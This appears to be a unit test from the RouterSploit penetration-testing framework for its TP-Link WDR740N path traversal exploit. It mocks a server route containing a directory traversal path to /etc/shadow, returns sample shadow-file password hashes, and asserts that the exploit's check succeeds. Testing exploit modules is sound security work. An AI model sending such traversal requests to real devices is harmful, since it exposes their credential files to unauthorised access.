from routersploit.modules.exploits.routers.tplink.wdr740nd_wdr740n_path_traversal import Exploit
def test_check_success(target):
""" Test scenario - successful check """
route_mock = target.get_route_mock("/help/../../../../../../../../../../../../../../../../etc/shadow", methods=["GET"])
route_mock.return_value = (
"#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::"
"root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::"
"Admin:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::"
"#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::"
)
exploit = Exploit()
exploit.target = target.host
exploit.port = target.port
assert exploit.check()
assert exploit.run() is None